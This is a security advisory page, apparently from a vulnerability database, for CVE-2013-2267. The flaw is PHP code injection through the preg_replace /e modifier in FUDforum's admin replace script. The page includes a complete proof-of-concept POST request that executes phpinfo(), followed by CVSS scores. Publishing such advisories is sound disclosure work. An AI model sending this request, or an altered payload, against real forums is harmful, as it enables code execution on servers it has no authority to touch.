Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23146
HistoryFeb 21, 2013 - 12:00 a.m.

PHP Code Injection in FUDforum

2013-02-2100:00:00
High-Tech Bridge
www.htbridge.com
29

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.052 Low

EPSS

Percentile

92.2%

JSON

High-Tech Bridge Security Research Lab discovered vulnerability in FUDforum, which can be exploited to execute arbitrary PHP code on the target system.

  1. PHP Code Injection in FUDforum: CVE-2013-2267
    The vulnerability exists due to insufficient validation of HTTP POST parameters “regex_str”, “regex_str_opt” and “regex_with” in “/adm/admreplace.php” script before using them in the “preg_replace()” function. A remote administrator can send a specially crafted HTTP POST request, inject and execute arbitrary PHP code on the target system with privileges of the web server.
    The following PoC (Proof of Concept) code executes the “phpinfo()” function:
    POST /adm/admreplace.php HTTP/1.1
    Host: fudforum
    Referer: http://fudforum/adm/admreplace.php?&SQ=8928823a5edf50cc642792c2fa4d8863
    Coo kie: fud_session_1361275607=11703687e05757acb08bb3891f5b2f8d
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 111
    SQ=8928823a5edf50cc642792c2fa4d8863&rpl_replace_opt=0&btn_submit=Add& btn_regex=1&edit=&regex_str=(.*)&regex_str_opt=e&regex_with=phpinfo()
    Successful exploitation of the vulnerability requires administrative privileges within the application.
CPENameOperatorVersion
fudforumle3.0.4

Related

packetstorm 1
cve 1
securityvulns 2
prion 1
zdt 1
cvelist 1
packetstorm
packetstorm
FUDforum 3.0.4 Code Injection
2013-04-03 00:00:00
cve
cve
CVE-2013-2267
2020-01-27 22:15:00
securityvulns
securityvulns
PHP Code Injection in FUDforum
2013-05-06 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2013-05-06 00:00:00
prion
prion
Code injection
2020-01-27 22:15:00
zdt
zdt
FUDforum 3.0.4 Code Injection Vulnerability
2013-04-04 00:00:00
cvelist
cvelist
CVE-2013-2267
2020-01-27 21:39:36

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.052 Low

EPSS

Percentile

92.2%

JSON
Related for HTB23146
packetstorm1cve1securityvulns2prion1zdt1cvelist1